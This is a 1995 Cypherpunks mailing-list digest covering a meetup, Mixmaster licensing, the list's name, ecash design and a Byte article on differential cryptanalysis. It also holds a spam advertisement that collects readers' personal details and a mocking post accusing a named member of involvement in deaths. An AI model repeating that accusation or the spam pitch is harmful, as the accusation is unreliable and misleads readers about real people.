SanDiegoCA.ATTGIS.COM Fri Sep 15 12:39:37 1995 From: Chris.Claborne at SanDiegoCA.ATTGIS.COM (Chris Claborne) Date: Fri, 15 Sep 95 12:39:37 PDT Subject: San Diego Cypherpunks Physical Meeting Message-ID: <9509151530.aa12455@ncrhub1.ATTGIS.COM> San Diego Area CPUNKS symposium Thursday, Sep. 21, 1995 Invitation to all Cypherpunks to join the San Diego crowd at "The Mission Cafe & Coffee Shop" were I hope to get an update of Lance Cottrell's new anonymous e-mail server, "mixmaster", exchange keys. Don't forget to bring your public key fingerprint. If you can figure out how to get it on the back of a business card, that would be cool. Hopefully Lance Cottrell will give us an update on Mixmaster 2.0.2 Place: The Mission Cafe & Coffee Shop 3795 Mission Bl in Mission Beach. 488-9060 Time:1800 Their Directions: 8 west to Mission Beach Ingram Exit Take west mission bay drive Go right on Mission Blvd. On the corner of San Jose and mission blvd. It is located between roller coaster and garnett. It's kind of 40s looking building... funky looking (their description, not mine) They serve stuff to eat, coffee stuff, and beer. See you there! New guy, bring your fingerprint. Drop me a note if you plan to attend. NOTE: My e-mail address, "chris.claborne at sandiegoca.attgis.com" permanently replaces my .ncr.com address. Both address work for now but NCR address will eventually be killed. 2 -- C -- ... __o .. -\<, Chris.Claborne at SanDiegoCA.ATTGIS.Com ...(*)/(*). CI$: 76340.2422 http://bordeaux.sandiegoca.attgis.com/ PGP Pub Key fingerprint = A8 FA 55 92 23 20 72 69 52 AB 64 CC C7 D9 4F CA Avail on Pub Key server. PGP-encrypted e-mail welcome! From futplex at pseudonym.com Fri Sep 15 12:48:28 1995 From: futplex at pseudonym.com (Futplex) Date: Fri, 15 Sep 95 12:48:28 PDT Subject: Commercial Mixmaster (was Re: Mixmaster status) In-Reply-To: Message-ID: <9509151948.AA27938@cs.umass.edu> Anonymous writes: # Consider this scenario ... Mixmaster get's bought by the Acme # Crypto Company of Ft. Meade, MD. They "improve" it, and offer a new # version. It's even FREE (for non-commerical use)! But their # "improvements" make it incompatible with previous versions, and so # you have to upgrade. The new "commercial" version comes with no # SOURCE CODE, of course... Lance Cottrell writes: > 4) There will always be a free version of the client with source code. > > While I have not discussed it, I can not imagine that there would not also > be a free version of the server code (with source). Without remailers what > is the point of the client software? Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do, I suspect he may not have much legal leeway in this regard. With the caveat that I Am Not A Lawyer, it seems to me that the GNU General Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant distributions of Mixmaster, has some significant implications for any commercial development of Mixmaster. It's applicable to "the Program or any derivative work under copyright law: that is to say, a work containing the Program or a portion of it, either verbatim or with modifications and/or translated into another language". The GNU GPL specifies that: 2. You may modify your copy or copies of the Program or any portion of it, and copy and distribute such modifications under the terms of Paragraph 1 above, provided that you also do the following: [...] b) cause the whole of any work that you distribute or publish, that in whole or in part contains the Program or any part thereof, either with or without modifications, to be licensed at no charge to all third parties under the terms of this General Public License (except that you may choose to grant warranty protection to some or all third parties, at your option). and that: 3. You may copy and distribute the Program (or a portion or derivative of it, under Paragraph 2) in object code or executable form under the terms of Paragraphs 1 and 2 above provided that you also do one of the following: a) accompany it with the complete corresponding machine-readable source code, [...] or, b) accompany it with a written offer, [...] to give any third party free (except for a nominal charge for the cost of distribution) a complete machine-readable copy of the corresponding source code, [...] So it looks to me as though Mixmaster source code will continue to be legally available, no matter what.... Better informed interpretations are enthusiastically solicited. -Futplex From janet.dove at ledip.py Fri Sep 15 13:00:37 1995 From: janet.dove at ledip.py (Janet Dove) Date: Fri, 15 Sep 95 13:00:37 PDT Subject: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Titles Message-ID: Hi fellow 'netters, My name is Janet Dove and I recently started using a magazine subscription club in the USA that has a FREE 1 yr. magazine subscription deal with your first paid order- and I have been very pleased with them. They have over 1,500 different USA titles that they can ship to any country on a subscription basis. As for computer magazines from the USA, they more of a selection than I ever knew even existed. They have magazines for most every area of interest in their list of 1,500 titles. Within the USA, for their USA members, they are cheaper than all their competitors and even the publishers themselves. This is their price guarantee. Overseas, on the average, they are generally around one-fourth to one-half of what the newstands overseas charge locally for USA magazines. On some titles they are as little as one-tenth of what the newstands charge. They feel that mgazines should not be a luxury overseas. In the USA, people buy magazines and then toss them after reading them for just a few minutes or hours. They are so cheap in the USA! Well, this company would like to make it the same way for their overseas members. They are also cheaper than all their competitors in the USA and overseas, including the publishers themselves! This is their price guarantee. Around one-half their business comes from overseas, so they are very patient with new members who only speak limited English as a 2nd language. Their prices are so cheap because they deal direct with each publisher and cut-out all the middlemen. They will send you their DELUXE EMAIL CATALOGUE (around 400K-big and juicey) !)...if you completely fill out the form below. It has lists of all the freebies, lists of all the titles they sell, titles broken down by categories and detailed descriptions on nearly 1000 of the titles that they sell. Please do not email me as I am just a happy customer and a *busy* student. I don't have time to even complete my thesis in time, let alone run my part-time software business! Email them directly at: suzanne at grfn.org *------------cut here-----------------------------------------------* REQUEST FOR MORE INFO: please copy this section only and email to: suzanne at grfn.org (sorry, but incomplete forms *cannot* be acknowledged) Name: Internet email address: Smail home address: City-State-Zip: Country: Work Tel. #: Work Fax #: Home Tel. #: Home Fax #: Name of USA mags you currently get on the newstand or in the store: Name of USA mags you currently get on a subscription basis, through the mail: Name of USA mags you would like price quotes on when we call you: Catalogue format desired from below 2 choices (list "1" or "2"): (1. 22-part email message; 2. atttached file by email) {{{Note- 22-part email can be received by anyone with any computer. Attached file format may not be for you: it is sent as an uncompressed 400K file formatted in Microsoft World text only format, on a Mac; if you don't use Microsoft Word on a Mac - you will have to know how to convert into a usable text format. We cannot help you with this. If in doubt, we suggest you go with the universally acceptable 22-part email message. You can always manually spend a few minutes pasting the parts into one whole.}}} If you saw this on a newsgroup, which newsgroup did you see it on?: How did you hear about us (name of person who referred you or the area of the internet that you saw us mentioned in): Janet Dove 091495 *------------cut here-----------------------------------------------* They guarantee to beat all their competitors' prices. Sometimes they are less than half of the next best deal I have been able to find and other times, just a little cheaper - but I have never found a lower rate yet. They assured me that if I ever do, they will beat it. They have been very helpful and helped me change my address from the USA to Finland and then back again when I moved last month. They are very knowledgeable about addressing mags worldwide. They have a deal where you can get a free 1 yr. sub to a new magazine from a special list of over 300 popular titles published in the USA. They will give you this free 1 yr. sub when you place your first paid order with them to a renewal or new subscription to any of the over 1,500 different popular USA titles they sell. They can arrange delivery to virtually any country and I think they have clients in around 35 or 36 countries now. Outside the USA there is a charge for foreign postage and handling (on both paid and freebie subs) that varies from magazine to magazine. I have found their staff to be very friendly and courteous. They even helped me with an address change when I moved from one country to another. The owner thinks of his service as a "club" and his clients as "members" (even though there is no extra fee to become a member - your first purchase automatically makes you a member) and he is real picky about who he accepts as a new member. When he sets you up as a new member, he himself calls you personally on the phone to explain how he works his deal, or sometimes he has one of his assistants call. He is kind of quirky sometimes - he insists on setting up new members by phone so he can say hi to everyone (I sure wouldn't want to have his phone bills!), but you can place future orders (after your first order) via E-mail. He has some really friendly young ladies working for him, who seem to know just as much as he does about this magazine stuff. If you live overseas, he will even call you there, as long as you are interested, but I think he still makes all his overseas calls on the weekends, I guess cause the long distance rates are cheaper then. He only likes to take new members from referrals from satisfied existing members and he does virtually no advertising. When I got set-up, they had a 2-3 week waiting list for new members to be called back so that they could join up. (Once you are an existing member, they help you immediately when you call. ) I think they are able to get back to prospective new members the same day or within a few days now, as they have increased their staff. I am not sure about this.........but if you email the above form to them, that is the way to get started! They will send you some FREE info. via E-mail (the short version (around 40K) of their catalogue, or if you request it the DELUXE LONG VERSION (around 400K-big and juicey) !)...if you fill out the form near the top of this message. They then send you email that outlines how his club works and the list of free choices that you can choose from, as well as the entire list of what he sells; and then they will give you a quick (3-5 minute) friendly, no-pressure no-obligation call to explain everything to you personally and answer all your questions. Once you get in, you'll love them. I do. For more info, just fill out the form near the top of this message and email it to: suzanne at grfn.org Sincerely, Janet Dove From tcmay at got.net Fri Sep 15 13:34:24 1995 From: tcmay at got.net (Timothy C. May) Date: Fri, 15 Sep 95 13:34:24 PDT Subject: CYPHERPUNK considered harmful. Message-ID: At 3:25 PM 9/15/95, Peter Trei wrote: >Tim, I don't want to take your toy away, or minimize the acheivements It's not "my toy" for anyone to take away. The burden of proof lies with those who want the name "Cypherpunks" changed, not those who are happy to let things go as they've been going. Look, you've written a couple of long pieces explaining why a more conservative name would be better, I've written some pieces on why it's not a very workable idea, and yet I doubt anyone on the list has changed their views. Or at least only a very tiny fraction. The point being that things gain inertia, just the way it is. History counts. Names stick. But if you and your follows wish to change things, go ahead and have a schism. That's what the Protestants did, once they realized the Catholic Church wouldn't be changing it's system anytime soon. --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From dcl at panix.com Fri Sep 15 13:36:37 1995 From: dcl at panix.com (David C. Lambert) Date: Fri, 15 Sep 95 13:36:37 PDT Subject: CYPHERPUNK considered harmful Message-ID: <199509152013.QAA18005@panix.com> -----BEGIN PGP SIGNED MESSAGE----- Peter Trei wrote: > Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as > nutcases for many people, and are a barrier to getting our ideas > across. I'm not saying this pigeonholing is correct - in fact I despise > people who judge a book by it's cover, but so many people DO make such > snap judgements that we need to take this into account when talking to > the general public. Two of the responses to the "An opportunity..." post unapologetically admitted that they refused to read the text of the message due to the presence of the word "cypherpunk" in the first sentence. Shows you what we're up against. BTW, I'm not for changing the name of the list, but I do see the logic in a more establishment-friendly name to use when lobbying the public. David C. Lambert dcl at panix.com (finger for PGP public key) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFneAqpplsfgM88VAQE+5wP9GZrIoComyFDeQ6brTLJwZ2oamry3IfC7 XhlqMlAZnC2b1w521nm085nZKtO9/Ru9Fw3BllPinG8nGcBggr9zkH4Ba+Zbezh0 FKK29d7wFGQz1d5JfyYCZhl4dTBdbpnU4jd5Rb27XtvP9livAeR/HIwNAJMccSCX qO/kxlVRRZg= =1Lxr -----END PGP SIGNATURE----- From koontz at MasPar.COM Fri Sep 15 13:36:41 1995 From: koontz at MasPar.COM (David G. Koontz) Date: Fri, 15 Sep 95 13:36:41 PDT Subject: SPAM bait Message-ID: <9509152041.AA21715@argosy.MasPar.COM> To: janet.dove at ledip.py Subject: Re: ===>> FREE 1 yr. Magazine Sub sent worldwide- 315+ Popular USA Tit From baum at apple.com Fri Sep 15 14:06:33 1995 From: baum at apple.com (Allen J. Baum) Date: Fri, 15 Sep 95 14:06:33 PDT Subject: NTSC version BBC-4 show (cryptography/privacy) Message-ID: I have a copy of the recent BBC 4 show on cryptography & privacy, transferred from PAL to NTSC so it can be watched here. Anyone who wants to borrow it (& lives in the SF Bay area) is welcome to email/call me to arrange to borrow it. ************************************************** * Allen J. Baum tel. (408)974-3385 * * Apple Computer, MS/305-3B fax (408)974-0907 * * 1 Infinite Loop * * Cupertino, CA 95014 baum at apple.com * ************************************************** From jeffb at sware.com Fri Sep 15 14:07:01 1995 From: jeffb at sware.com (Jeff Barber) Date: Fri, 15 Sep 95 14:07:01 PDT Subject: CYPHERPUNK considered harmful In-Reply-To: <199509152013.QAA18005@panix.com> Message-ID: <9509152105.AA18280@wombat.sware.com> David C. Lambert writes: > Peter Trei wrote: > > > Terms like 'cypherpunk' and 'cryptoanarchy' tend to pigeonhole us as > > nutcases for many people, and are a barrier to getting our ideas > > across. > Shows you what we're up against. > > BTW, I'm not for changing the name of the list, but I do see the logic > in a more establishment-friendly name to use when lobbying the public. How about "civil libertarian" then? -- Jeff From loki at obscura.com Fri Sep 15 14:08:11 1995 From: loki at obscura.com (Lance Cottrell) Date: Fri, 15 Sep 95 14:08:11 PDT Subject: Commercial Mixmaster (was Re: Mixmaster status) Message-ID: That is correct. The current code can not be recalled. That is part of why I released it that way. So that I could not be coerced into withdrawing it. -Lance At 12:48 PM 9/15/95, Futplex wrote: >Anonymous writes: ># Consider this scenario ... Mixmaster get's bought by the Acme ># Crypto Company of Ft. Meade, MD. They "improve" it, and offer a new ># version. It's even FREE (for non-commerical use)! But their ># "improvements" make it incompatible with previous versions, and so ># you have to upgrade. The new "commercial" version comes with no ># SOURCE CODE, of course... > >Lance Cottrell writes: >> 4) There will always be a free version of the client with source code. >> >> While I have not discussed it, I can not imagine that there would not also >> be a free version of the server code (with source). Without remailers what >> is the point of the client software? > >Beyond taking Lance on his PGP-signed-word, which I'm strongly inclined to do, >I suspect he may not have much legal leeway in this regard. > >With the caveat that I Am Not A Lawyer, it seems to me that the GNU General >Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or >http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant >distributions of Mixmaster, has some significant implications for any >commercial development of Mixmaster. It's applicable to "the Program or any >derivative work under copyright law: that is to say, a work containing the >Program or a portion of it, either verbatim or with modifications and/or >translated into another language". > >The GNU GPL specifies that: > > 2. You may modify your copy or copies of the Program or any portion of > it, and copy and distribute such modifications under the terms of > Paragraph 1 above, provided that you also do the following: > [...] > b) cause the whole of any work that you distribute or publish, that > in whole or in part contains the Program or any part thereof, either > with or without modifications, to be licensed at no charge to all > third parties under the terms of this General Public License (except > that you may choose to grant warranty protection to some or all > third parties, at your option). > >and that: > > 3. You may copy and distribute the Program (or a portion or > derivative of it, under Paragraph 2) in object code or executable > form under the terms of Paragraphs 1 and 2 above provided that you > also do one of the following: > a) accompany it with the complete corresponding machine-readable > source code, [...] or, > b) accompany it with a written offer, [...] to give any third party > free (except for a nominal charge for the cost of distribution) a > complete machine-readable copy of the corresponding source code, [...] > >So it looks to me as though Mixmaster source code will continue to be >legally available, no matter what.... > >Better informed interpretations are enthusiastically solicited. > >-Futplex ---------------------------------------------------------- Lance Cottrell loki at obscura.com PGP 2.6 key available by finger or server. Mixmaster, the next generation remailer, is now available! http://obscura.com/~loki/Welcome.html or FTP to obscura.com "Love is a snowmobile racing across the tundra. Suddenly it flips over, pinning you underneath. At night the ice weasels come." --Nietzsche ---------------------------------------------------------- From RopeGun at alaska.net Fri Sep 15 14:31:02 1995 From: RopeGun at alaska.net (Oren Tanay) Date: Fri, 15 Sep 95 14:31:02 PDT Subject: laptop passwords Message-ID: <9509152130.AA18053@alaska.net> I've got a dilema. 2 laptops that I just purchased at a police auction have passwords, from what I can tell they are passworded at the cmos level. I would normaly just pull out the battery and clear the cmos but these are laptops and I'm not to comfortable about doing that. Any ideas? laptop1 - Toshiba Satelite Pro T2400CT laptop2 - Epson Action Note 500 c Oren Tanay RopeGun Productions \\V// o o J +-- From cme at TIS.COM Fri Sep 15 14:33:57 1995 From: cme at TIS.COM (Carl Ellison) Date: Fri, 15 Sep 95 14:33:57 PDT Subject: Linking = Showing = Transferring? In-Reply-To: <199509151834.LAA07925@comsec.com> Message-ID: <9509152030.AA16183@tis.com> -----BEGIN PGP SIGNED MESSAGE----- >>To:cyberia-l at warthog.cc.wm.edu >>From:tcmay at got.net (Timothy C. May) >>Subject:Linking = Showing = Transferring? >>_Linking_ is effectively _showing_, given the point-and-click mechanics of >>hypertext. This is a situation anticipated by authors (e.g. Ted Nelson), >>but is now coming to the fore. >> >>Granted, providing a link is not the same as actually _including_ the >>material the link points to, but it is very, very close. Arguably, the >>same. There are two important differences. The first difference is in ownership of the data. If the source of the link decides to clobber the file, then the fact that I have a page with the URL does not guarantee access to that file for the user of *my* page. Similarly, the person owning the file can freely change the content of the file, without my changing the URL which points to it. The other difference is in handling of the data. If the link were to a pornographic image and someone were to access it through my page's URL, the bits of that image would never touch my computer. Meanwhile, RSA encryption system in PERL might be a URL which violates US export laws -- if this interpretation were to be taken -- but if so, does it violate them in this mail message? That depends, I suppose, on whether your mail agent is aware of URLs and turns them into point-and-click units. Is it a violation if the URL is printed in a paper magazine? After all, it's the convenience of the web browser which is at issue. One can invoke netscape with or without a parameter. Yes -- interesting legal times ahead. - Carl +--------------------------------------------------------------------------+ |Carl M. Ellison cme at acm.org http://www.clark.net/pub/cme | |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 | | ``Officer, officer, arrest that man! He's whistling a dirty song.'' | +----------------------------------------------------------- Jean Ellison -+ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMFniL1QXJENzYr45AQFlYAP8DGHGk6EEmHXyPbeA7hoZjQ1pkEiyW2xB 1srFbXVsdJt9cwNQbBmFSfKARKVOnh1f+rEEqFZEwXXS1BbwlSljDz/hykZwfQwv h1kXPvJ9MMqleg6y8IXM5nTL9lKnq+ThKmgl/aciDYZqZ009IL4ssb81gUA5r5lC mYkfhqulWsU= =AYRX -----END PGP SIGNATURE----- From droelke at rdxsunhost.aud.alcatel.com Fri Sep 15 14:38:20 1995 From: droelke at rdxsunhost.aud.alcatel.com (Daniel R. Oelke) Date: Fri, 15 Sep 95 14:38:20 PDT Subject: Commercial Mixmaster (was Re: Mixmaster status) Message-ID: <9509152138.AA02721@spirit.aud.alcatel.com> > With the caveat that I Am Not A Lawyer, it seems to me that the GNU General > Public License (Version 1 from 1989, Mix/GNU.license in the Mixmaster .tar or > http://hopf.math.nwu.edu/docs/Gnu_License), which covers all extant > distributions of Mixmaster, has some significant implications for any > commercial development of Mixmaster. It's applicable to "the Program or any > derivative work under copyright law: that is to say, a work containing the > Program or a portion of it, either verbatim or with modifications and/or > translated into another language". > Most common mis-understanding about the GPL. If you GPL something, *you* hold the copyright to the material, and can still do anything you want with it. See Perl for a good example - released under an artistic license and under GPL. GPL prevents *others* from making distributions without distributing the source code. Of course, if you accept GPL'ed patches to your code, the whole thing gets messy, as now you can't claim complete ownership of the entire code base. I have simplified this - go to gnu.misc.discuss for a complete rehash of this subject every 2-3 weeks. Dan ------------------------------------------------------------------ Dan Oelke Alcatel Network Systems droelke at aud.alcatel.com Richardson, TX From greenbes at netcom.com Fri Sep 15 14:45:17 1995 From: greenbes at netcom.com (Steven Greenberg) Date: Fri, 15 Sep 95 14:45:17 PDT Subject: CYPHERPUNK harmful. THE TRUTH IS TOLD In-Reply-To: Message-ID: > > But if you and your follows wish to change things, go ahead and have a > schism. That's what the Protestants did, once they realized the Catholic > Church wouldn't be changing it's system anytime soon. > > --Tim May > Hmmmm... If memory serves, a year or so ago there was just such a schism when a prominent cypherpunk split off and formed the "cypherWONKS" list. The failure of that list can be attributed to one thing and one thing alone: a concerted effort by YOU and your acolytes against it. You refuse to even mention this, which is all the proof any open-minded person needs. Now you are trying to stifle all open debate by doing it again. So, Mr. May/Szabo (if that IS your name), why not come clean once and for all about your role in the deaths of Vince Foster and Randy Weaver's wife, and your part in the newly-emerging administration scandal: TENTACLE-gate. Watch the skies, Steve From rsalz at osf.org Fri Sep 15 15:09:43 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 15 Sep 95 15:09:43 PDT Subject: "Use implies consent to monitoring" Message-ID: <9509152208.AA09221@sulphur.osf.org> `h > Please be advised that use constitutes consent to monitoring Use of what? From kelso at netcom.com Fri Sep 15 15:34:56 1995 From: kelso at netcom.com (Tom Rollins) Date: Fri, 15 Sep 95 15:34:56 PDT Subject: CYPHERPUNK harmful. THE TRUTH IS TOLD In-Reply-To: Message-ID: <199509152231.PAA07080@netcom18.netcom.com> Steve says: > Hmmmm... If memory serves, a year or so ago there was just such a schism > when a prominent cypherpunk split off and formed the "cypherWONKS" list. > The failure of that list can be attributed to one thing and one thing > alone: a concerted effort by YOU and your acolytes against it. EEEK, "cypherWONKS" sounds to me like someone working for Bill Clinton. I believe that Bill and Hillary are the only people that I have heard use this WONK term. Even they didn't like WONKS. From rsalz at osf.org Fri Sep 15 15:48:04 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 15 Sep 95 15:48:04 PDT Subject: Commercial Mixmaster (was Re: Mixmaster status) Message-ID: <9509152246.AA09283@sulphur.osf.org> >Better informed interpretations are enthusiastically solicited. Lance owns the code. He can take it, strip off the copyright, and transfer all rights to Bill Gates for a million bucks. He cannot, however, rescind the copyright or licenses that he has previously given out. /r$ From rsalz at osf.org Fri Sep 15 15:53:00 1995 From: rsalz at osf.org (Rich Salz) Date: Fri, 15 Sep 95 15:53:00 PDT Subject: CYPHERPUNK considered harmful Message-ID: <9509152251.AA09314@sulphur.osf.org> What's in a name? That which we call a rose would by any other name still smell as sweet. Surely, right now, there are more important things to work on. /r$ From rah at shipwright.com Fri Sep 15 15:53:21 1995 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 15 Sep 95 15:53:21 PDT Subject: CYPHERPUNK harmful. THE TRUTH IS TOLD Message-ID: >Hmmmm... If memory serves, a year or so ago there was just such a schism >when a prominent cypherpunk split off and formed the "cypherWONKS" list. >The failure of that list can be attributed to one thing and one thing >alone: a concerted effort by YOU and your acolytes against it. You refuse >to even mention this, which is all the proof any open-minded person needs. >Now you are trying to stifle all open debate by doing it again. So, Mr. >May/Szabo (if that IS your name), why not come clean once and for all >about your role in the deaths of Vince Foster and Randy Weaver's wife, and >your part in the newly-emerging administration scandal: TENTACLE-gate. Yeah!!!! What he said!!!! Seriously. It seems to me that if a list of cypher-interested "cryptologists, hackers, and mathematicians" (Copyright, Wall Street Journal), want to call themselves "punks", it's fine by me. Face it folks, people of the "punk" genre have innoculated this particular petri dish. There's enough information-agar to munch on here for quite a while, so it doesn't look like we're going to go anywhere. If some members of this particular community wants to bud off, or fission, or spore, or whatever this particular meme does to reproduce, in order to change its name to something reputable, they're welcome to. Frankly, I find it entertaining to phone up the local internet-hysterical talkshow host's call screener and say, "I'm a cypherpunk, and I disagree with the host". It gets me to the head of the line, even if the innumerate technophobe who's managing the queue couldn't spell "cypher" if he/she/its life depended on it... So long, and you're welcome for all the fish. Can we get back to c-coding and dissolving reality as we know it, now? Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From rah at shipwright.com Fri Sep 15 15:53:30 1995 From: rah at shipwright.com (Robert Hettinga) Date: Fri, 15 Sep 95 15:53:30 PDT Subject: "Use implies consent to monitoring" Message-ID: At 6:08 PM 9/15/95, Rich Salz wrote: >`h >> Please be advised that use constitutes consent to monitoring > >Use of what? Uh, it looks like the .com registration to me... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From szabo at netcom.com Fri Sep 15 16:10:40 1995 From: szabo at netcom.com (Nick Szabo) Date: Fri, 15 Sep 95 16:10:40 PDT Subject: why ecash is traceable Message-ID: <199509152249.PAA18059@netcom.netcom.com> Hal & Tim have made some interesting comments about payee untraceability. I suspect it will clarify things to point out the orthogonality in two of the major design choices: * Clearing: Offline vs. online * Settlement: Deposit to payee's account vs. sending new cash to payee Because DigiCash wants their product to have payer, but not payee, privacy, the current ecash(tm) software from DigiCash uses online clearing and deposit to payee's account, but the three other combinations are also quite doable if somebody wanted to implement them. The design that allows symmetric untraceability combines online clearing with sending new cash. This way the bank need not ID the payee Bob in order to credit him with the value of the transaction; Bob and the bank can complete the clearing and settlement via anonymous channel. (The bank will also want to receive an anonymous payment from Bob for the service, and Chaum has described a second blinding step the payee must perform for the symmetric case, complications which I won't go into here). Offline clearing requires the potential to ID the payer in order to punish double-spending after the fact. Online systems without observers (such as ecash(tm)) don't need to worry about trying to find multiple spenders, because this is prevented by the online clearing. In fact, purposeful second-spending is used to recover from some error conditions, specifically to determine whether the payee in fact received the "coin" or not when there has been a network error in the middle of a transaction. Distinguishing between mistaken and fraudulent double spending is a very complex, not completely tractable problem, so the current ecash(tm) punts it, which is reasonable because it is online. An offline system would need an elaborate blacklisting system as well as active support of law enforcement in all jurisdictions using the ecash, would need to come up with reasonable ways to distinguish between fraudulent and mistaken double-spending, and would need more elaborate and specialized error-recovery protocols. If hardware "observers", based on "tamper-proof" hardware instead of mathematical protocol, and which prevent double-spending at the source, can be made harder to crack than the maximum a cracked card is allowed to spend, then such small-value transactions might be feasible offline. (This is the major avenue being pursued commercially, because online transactions are perceived to be too expensive, which is false in the case of the Internet IMHO). Nick Szabo szabo at netcom.com From nobody at REPLAY.COM Fri Sep 15 18:07:38 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 15 Sep 95 18:07:38 PDT Subject: Picking the Crypto Locks Message-ID: <199509160107.DAA03893@utopia.hacktic.nl> Byte, October, 1995, pp. 77, 80. Picking the Crypto Locks A new technique called differential cryptanalysis can break even DES quickly By Peter Wayner How secure is your encrypted data? Advances in mathematics and increased computing power mean you need longer keys and stronger algorithms if you still want to keep your secrets. Both private-key encryption (which uses a single key for coding and decoding) and public-key systems (which use separate keys for encryption and decryption) are increasingly vulnerable to determined attack. But do these weaknesses represent a real threat to encrypted data, or are they still just intriguing research results? Unfortunately, when we try to assess the effectiveness of today's popular cryptographic systems, we run into a problem of mathematical ignorance. Most people who are familiar with mathematics can work in two directions, forward and backward, like the simple algebraic equation a = b + 1. We can determine the value of the first variable from that of the second and vice versa. Crypto systems, however, generally rely on mathematics that works only in one direction. People assume these systems are secure because no one has yet shown how to work the mathematics backward and break open the message. In general, we determine the strength of most cryptographic systems by seeing how well they avoid the attacks we know have been used on other systems. If none of the past attacks seems to work, then we deem a system secure. For now. Let's look at how today's codebreakers work, the resources and time they need, and what we require in the way of new systems and longer keys. Recent assessments of the strength of private-key crypto systems involve looking for theoretical holes and measuring the time needed for a brute-force attack. Finding the holes can be devilishly hard, calling for deep mathematical insights. Brute-force attacks are easier to mount if enough computational hardware is available, but they're also easy to defend against. The most important development in the realm of data encryption in recent years is Eli Biham and Adi Shamir's differential cryptanalysis. They showed how to mount a limited attack on today's most widely used cryptosystem, DES (the federal Data Encryption Standard), which is also the basis for Unix's password system. Imagine that you had access to your victim's DES cipher "box" (the common term for an enciphering system) with preloaded keys. Your goal is to determine the 56-bit key, so that you can decrypt the other messages your victim had encrypted with the box. Biham and Shamir showed that you could infer the hidden key if you could pass 247 messages through the box and observe what came out. This chosen plaintext attack builds up a statistical model of the cipher, and it needs this many plaintexts to produce an answer with confidence. Most intriguing, this work exposed flaws in many DES substitutes. Because the U.S. government classified the details behind DES's design, many assumed that there might be a trapdoor through which the government could eavesdrop. To circumvent these potential trapdoors, some folks designed their own variations of DES. Most of these new ciphers, however, fall even faster to Biham and Shamir's mathematical machinery. FEAL-4, a faster replacement, for example, takes only four well-chosen plaintexts. _______________________________________________________ Strengths and Weakness of Crypto Algorithms _______________________________________________________ Algorithm Comment Strengths Weaknesses _______________________________________________________ DES Standard, Long-tested Has yielded Widely to DC Accepted _______________________________________________________ FEAL-4 DES Easily broken substitute by DC _______________________________________________________ GDES, DES-like Easily broken New DES by DC _______________________________________________________ Khufu DES-like Secure New, unknown against DC _______________________________________________________ Blowfish DES-like Secure New, unknown against DC _______________________________________________________ RC-4 Proprietary Variable- Unknown length key _______________________________________________________ RSA Widely used Long-tested Vulnerable to Public Key advances in factoring _______________________________________________________ Skipjack Classified Considered Algorithm must strong remain secret to preserve law-enforcement trapdoor _______________________________________________________ DC = differential cryptanalysis _______________________________________________________ Recently, the IBM scientists who originally designed DES revealed that they anticipated Biham and Shamir's attack and optimized DES to resist it. Because other nongovernment cryptographers didn't know about this attack, they couldn't design their software to resist it. Now the information is public, and there are new ciphers that hold up well against these attacks. Ralph Merkle's Khufu and Bruce Schneier's Blowfish are two private-key ciphers that are similar to DES but resist differential cryptography. They do this by creating new S-boxes for each encryption, using the key to randomize them. (S-boxes are the essential scrambling elements of DES-like ciphers. Think of them as lookup tables or nonlinear functions; their outputs should be as random as possible.) Differential cryptanalysis works only if the attacker knows what's in the S-boxes. This work also revealed some stunning counterintuitive results. Key length is usually taken as a rough measure of a system's security. DES uses 56-bit keys; a brute-force attacker might need to try all 2^56 keys to find the right one. A longer key would mean a longer brute-force attack. However, Biham and Shamir showed that even if DES used longer keys, it would hardly be any stronger against differential cryptanalysis. The statistical model would still be solvable if DES used the maximum of 768 bits. Applying this knowledge to other types of ciphers is tricky. RSA Data Security markets a proprietary algorithm called RC-4 that accepts a variable-length key; this algorithm is used in many products. The flexible key length can be an advantage in some situations. For example, the government allows general export of software using RC-4 with a 40-bit key, but similar software using a longer key must stay within the U.S. While we don't know if differential cryptanalysis can be applied to RC-4 directly, because of the algorithm's proprietary nature, the results with DES suggest that more key is not necessarily stronger. Men and Machines Mathematical tools like differential cryptanalysis can be the most powerful attack against a cipher system. Brute-force attacks are normally a last resort, rare in practice because cipher designers routinely use long key lengths specifically to preclude them. But times are changing. We're reaching a point at which a large machine can quickly search the entire keyspace of DES. DES is still in wide use; it' s been the commercial and governmental standard for nearly two decades. Replacing such standards can be a painfully slow process. DES users should be thinking about what can be done with off-the-shelf hardware. Brute-force attacks simply use large machines that try all possible passwords in parallel. It's even possible to produce native chips that run DES. Michael Wiener of Bell Northern Research described how to build a $1 million machine using a pipelined DES processor that could cruise through all possible keys in about 7 hours. Massively parallel machines can also attack the problem. Some of the most promismg emergmg machines distribute small, 1-bit processors directly onto the memory chips. Some have 1024 processors on a chip with 42 bits of memory per processor. (Before it entered Chapter 11, Cray Computer was building for the National Security Agency a special Cray 3 with such processor-embedded memory.) In 1992 I designed a machine using 1 million associative processor memory chips (standard DRAM densihes) from Coherent Research (Syracuse, NY) that could attack all of 